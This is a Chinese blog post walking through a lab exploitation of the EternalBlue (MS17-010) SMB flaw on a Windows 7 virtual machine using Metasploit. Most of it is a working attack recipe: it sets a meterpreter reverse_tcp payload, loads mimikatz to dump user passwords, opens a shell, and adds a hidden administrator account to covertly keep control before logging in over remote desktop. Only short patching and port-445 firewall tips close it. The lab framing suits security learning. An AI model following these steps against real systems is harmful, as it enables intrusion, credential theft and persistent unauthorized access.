永恒之蓝 ms17_010_eternalblue

最新推荐文章于 2024-06-21 15:54:14 发布
最新推荐文章于 2024-06-21 15:54:14 发布
阅读量430 收藏 4
点赞数
分类专栏: 渗透 永恒之蓝 文章标签: 永恒之蓝 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41326328/article/details/94431917
版权

恶意代码会扫描开放共享端口的windows机器,无需用户任何
永恒之蓝是会扫描开放445端口文件共享端口的windows机器,无需用户任何操作,只要开机上网。
会感染windowsxp windows2000 windows2003 windowsvista mac os 系统等
1.实验环境:kali-linux windows7旗舰版
2.IP地址
kali:192.168.116.129
win7: 192.168.116.130
在这里插入图片描述
3.开始实验
在这里插入图片描述
进入msfconsole,利用windows/smb/ms17_010_eternalblue(永恒之蓝漏洞)
进行攻击靶机win7

4.使用永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalbule
在这里插入图片描述
5.设定靶机ip和操作机ip(主要是靶机ip,因为端口在这个漏洞模块里默认是445,不用再设置,本地监听端口4444也是如此)
设定靶机ip(win7):set rhost 192.168.116.130
设定操作机ip(kali):set lhost 192.168.116.129
在这里插入图片描述
6:设置TCP连接
set payload windows/x64/meterpreter/reverse_tcp
在这里插入图片描述
7.查看配置
show options在这里插入图片描述

查看是否设置成功
8.攻击
run 或者exploit

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
攻击成功 进入到meterpreter模块
9.获取win7用户密码
利用load mimikatz 调用获取系统用户密码
因为我这个已经加载过一次了,所以会报错

在这里插入图片描述
如果是第一次加载就会出现
在这里插入图片描述
然后利用kerberos模块 来获取win7靶机的系统用户密码

在这里插入图片描述
9.提权
shell
在这里插入图片描述

在这里插入图片描述
得到靶机权限
10.或者新建一个用户,偷偷的控制权限使用
net user liang 123456 /add (创建一个用户密码为admin 123456)
11.提权,将新建用户liang提权到管理员权限
net localgroup administrators liang /add
在这里插入图片描述

查看权限
net user liang
在这里插入图片描述
12,远程连接靶机桌面

在这里插入图片描述

在这里插入图片描述
直接用自己所创建的用户远程连接进入系统。
渗透测试成功
主要攻击 win7,server2008 之类的机器
防御办法:
1,网上下载补丁,
2,关闭445端口,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
检测445端口是否开启:
netstat -ano -p tcp | find “445”

夏天吖!
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows漏洞 MS17-010 / EternalBlue永恒之蓝)工具-易语言
06-11
MS17-010 / EternalBlue永恒之蓝) 漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
永恒之蓝ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以...
ms17-010 永恒之蓝
qq_62803993的博客
01-12 4049
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
EternalBlue永恒之蓝ms17_010使用
qq_42908224的博客
03-18 393
Required栏为yes,则Current Setting栏内的值需要进行设置
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
最新发布
记录学习
06-21 2447
msf永恒之蓝漏洞复现过程以及修复建议
复现漏洞之ms17-010永恒之蓝
m0_69555575的博客
06-18 732
小白的自我学习:永恒之蓝漏洞复现
永恒之蓝漏洞复现(ms17-010)
热门推荐
weixin_43913009的博客
04-01 2万+
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、永恒之蓝(Eternal Blue)二、复现环境三、复现过程1.主机发现2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(Eternal Blue) 永恒之蓝是在 Windows 的SMB服务处理SMB v1请求时发生的漏.
永恒之蓝漏洞 ms17_010 详解
qq_45953122的博客
10-25 5939
永恒之蓝ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
网安永恒之蓝检测工具
04-02
永恒之蓝EternalBlue)是利用微软Windows系统MS17-010安全漏洞的一种攻击工具,由NSA(美国国家安全局)开发,后被黑客组织泄露并广泛用于恶意攻击,例如 WannaCry 勒索病毒就与此漏洞有关。 该工具的"傻瓜式操作...
ms17-010.7z
01-28
这里提到的“ms17-010”是微软Windows操作系统的一个重大安全漏洞,正式名称为“ EternalBlue永恒之蓝)”。这个漏洞是在2017年4月由Shadow Brokers黑客组织泄露的NSA(美国国家安全局)网络武器库的一部分。 ...
小计一次永恒之蓝实战
08-20
2. **配置exploit模块**:使用`exploit/windows/smb/ms17_010_eternalblue`模块。 3. **设置目标IP地址**:将`RHOST`参数设置为目标主机的IP地址。 4. **设置监听端口**:通过`LPORT`参数指定Meterpreter的回连端口...
ms17-010永恒之蓝) 漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
永恒之蓝EternalBlueMS17-010
aopingying8163的博客
06-25 477
附加知识: 漏洞来源与背景: 这个漏洞最初是由NSA(美国国家安全局)发现的,但是他们发现漏洞他不讲,然后遭殃了吧。 后来 有一个黑客组织叫:Shadow Brokers (影子经纪人) 入侵了NSA下属的黑客组织,窃取了大量的工具。 并且将部分的黑客工具公开到互联网上拍卖,当时预期公开的价格是100W比特币(价值近5亿美元),但一直都没人买。 要知道黑客都是有脾气的, 一气...
EternalBlue永恒之蓝漏洞(MS17-010)复现
小石头的博客
11-30 2013
测试环境 靶机: Windows7 IP:192.168.5.90 开放445端口关闭防火墙 攻击机:Windows10/kali IP:192.168.5.42 1、查询漏洞模块 search ms17-010 2、使用扫描模块扫描是否有永恒之蓝漏洞 use auxiliary/scanner/smb/smb_ms17_0...
win7系统smb永恒之蓝【漏洞复现】
鹅子鱼的博客:很菜但是很好学的小菜鸟
12-21 2262
win7系统smb永恒之蓝【漏洞复现】
永恒之蓝漏洞复现
m0_50982731的博客
05-03 904
通过ms17-010对win7445端口进行攻击,查看管理员密码,并新建管理账号进行连接
MS17-010(Eternal blue永恒之蓝)木马持久化+后渗透+修复
m0_73135216的博客
09-12 677
MS17-010(Eternal blue永恒之蓝)木马持久化+后渗透+修复
【网络安全】MS17-010永恒之蓝”漏洞的利用
qq_45748133的博客
01-06 1万+
导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝”漏洞的简单利用。 一、实验原理 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 二、实验环境 三、实验记录 一次渗透的基本步骤 (1)启动kali虚机,进入root权限打开Metasploit渗透工具。 msfco
永恒之蓝ms17-010蓝屏
09-05
对于永恒之蓝EternalBlue)漏洞的使用可能导致系统蓝屏的问题,这是因为该漏洞可以被恶意利用来执行远程代码,可能导致系统崩溃或蓝屏。 MS17-010是微软发布的补丁,用于修复这个漏洞。如果您的系统没有安装此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值